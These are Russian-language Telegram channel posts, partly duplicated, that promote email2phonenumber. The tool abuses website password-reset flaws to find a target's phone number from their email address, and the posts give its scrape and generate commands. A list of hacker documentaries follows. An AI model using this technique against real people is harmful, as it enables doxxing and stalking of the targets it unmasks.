▪️«Bruteforce» — перебирает список телефонных номеров и инициирует сброс пароля на разных веб-сайтах, чтобы получить связанные маскированные электронные письма и сопоставить их с адресом жертвы.
‼️ Для корректной работы понадобится пара сторонних библиотек. Они могут быть легко установлены с помощью:
🔎 Поиск на сайтах по цифрам номера телефона:
▪️ Линк на GitHub
▪️ Сайт автора с описанием и применением инструмента
📌 Дополнительный материал по теме OSINT:
▪️ Сбор информации о человеке из открытых баз данных.
#OSINT
📧 email2phonenumber — это инструмент OSINT, который позволяет вам получить номер телефона цели, просто имея его адрес электронной почты.
☝🏻Этот инструмент помогает автоматизировать 🔎 обнаружение чьего-либо телефонного номера, используя недостатки дизайна сброса пароля и общедоступные данные.🤷🏻♂️
📌 Поддерживает 3 основные функции:
▪️ «scrape» — прочесывает веб-сайты на цифры телефонного номера, инициируя сброс пароля, используя адрес электронной почты получателя.
▪️«generate» — создает список действительных телефонных номеров на основе общедоступной информации плана нумерации телефонов страны.
▪️«Bruteforce» — перебирает список телефонных номеров и инициирует сброс пароля на разных веб-сайтах, чтобы получить связанные маскированные электронные письма и сопоставить их с адресом жертвы.
‼️ Для корректной работы понадобится пара сторонних библиотек. Они могут быть легко установлены с помощью:
install beautifulsoup4 requests👨🏻💻 Использование.
🔎 Поиск на сайтах по цифрам номера телефона:
email2phonenumber.py scrape -e target@email.co📖 Создать словарь действительных телефонных номеров на основе маски телефонного номера:
email2phonenumber.py generate -m 555XXX1234 -o /tmp/dic.txt👁 Визуальное и практическое применение автор продемонстрировал на 👉🏻 видео.
▪️ Линк на GitHub
▪️ Сайт автора с описанием и применением инструмента
📌 Дополнительный материал по теме OSINT:
▪️ Сбор информации о человеке из открытых баз данных.
#OSINT
🎬 15 документальных фильмов о хакерах и хакерстве.
Привет 😉 Сегодня выходной, а значит можно выделить время ⏳ и посмотреть что-нибудь мотивирующее.
💬 Ранее мы предлагали к просмотру 🎬7 фильмов, по которым можно изучать социальную инженерию | Социальная инженерия в кино. ❗️Сегодня предлагаем ознакомиться с документальными фильмами.
😉 Приятного просмотра ⤵️
👨🏻💻 Читать в telegra.ph | Зеркало
#Видео
Привет 😉 Сегодня выходной, а значит можно выделить время ⏳ и посмотреть что-нибудь мотивирующее.
💬 Ранее мы предлагали к просмотру 🎬7 фильмов, по которым можно изучать социальную инженерию | Социальная инженерия в кино. ❗️Сегодня предлагаем ознакомиться с документальными фильмами.
😉 Приятного просмотра ⤵️
👨🏻💻 Читать в telegra.ph | Зеркало
#Видео
Telegraph
15 документальных фильмов о хакерах и хакерстве.
Для того чтобы стать квалифицированным этичным хакером, кроме соответствующих знаний также необходимо иметь вдохновение. В настоящее время большинство интересующихся хакерством вдохновляются революционными работами некоторых хакерских групп, таких как «Аноним»…